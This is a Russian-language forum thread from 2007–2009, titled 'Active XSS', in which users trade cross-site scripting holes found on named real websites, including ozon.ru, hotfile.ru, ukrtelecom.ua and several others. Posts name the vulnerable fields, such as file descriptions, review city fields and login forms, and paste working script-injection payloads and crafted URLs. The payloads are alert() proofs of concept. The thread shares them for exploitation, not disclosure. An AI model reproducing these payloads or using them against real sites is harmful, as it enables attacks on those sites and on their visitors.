Активные XSS

Isis · 02.08.2007, 03:38

В этой теме выкладываем только активные XSS

Isis · 02.08.2007, 03:38

www.hotfile.ru
Закачиваем файл любой, в поле "Описание" суем наш зловредный код.
В данном случае

Код:

'"/><script>alert(/xss/)</script>

Получаем линк на скачивание, смотрим - активная хсс
Пример - http://www.hotfile.ru/52377/

Klaus Doring · 18.09.2007, 11:24

Код:

https://db.raid.ru/cgi-bin/ppo/excells/%3Cscript%3Ealert(587385376)</script>

Мой второй XSS

А вот первый

Код:

  http://perm.citydom.ru/index?acuparam=>"><ScRiPt>alert(1600688950)</ScRiPt>

Isis · 19.09.2007, 20:09

Klaus Doring, это не активные xss, а пассивные

http://paste.zloy.org/ вот активка

Isis · 19.10.2007, 21:11

Активка в булке 3.6.8
Автор: я =)

Код:

[img*]\"'/><script>alert(/xss/)</script>[/img]

K1nD[e]R · 17.11.2007, 15:32

http://www.abc.times.lv/
Вставляем: :

Код:

"><script>alert('xss')</script>

it's my · 30.06.2008, 14:53

ozon.ru
В отзыве на товар, уязвимое поле Страна/город. Недостаток в том, что нужно ждать два/три дня пока отзыв отправится в паблик.
Пример: http://www.ozon.ru/context/detail/id/3819533/

Код:

<td colspan="3" align="right" class="vertpadd" 
style="padding-right:20px; color:Gray;">Мамедов&nbsp;
(<a href=/context/client_opinion/ClientGuid/9596607c-384f-4f1e-a17f-ac49e92840c4/>все отзывы</a>), 
Москва<fuck>, 21 год
        </td>

f02 · 19.12.2008, 18:19

пример:

Код:

http://www.zachetka.ru/forum/showthread.aspx?threadId=35295

хсска в логине.

Azam · 19.06.2009, 18:56

объясните что такое хсс и как с ним работать!

Melk · 04.07.2009, 00:13

УкрТелеком

Код:

http://ukrtelecom.ua/webparts/feedback

Все поля...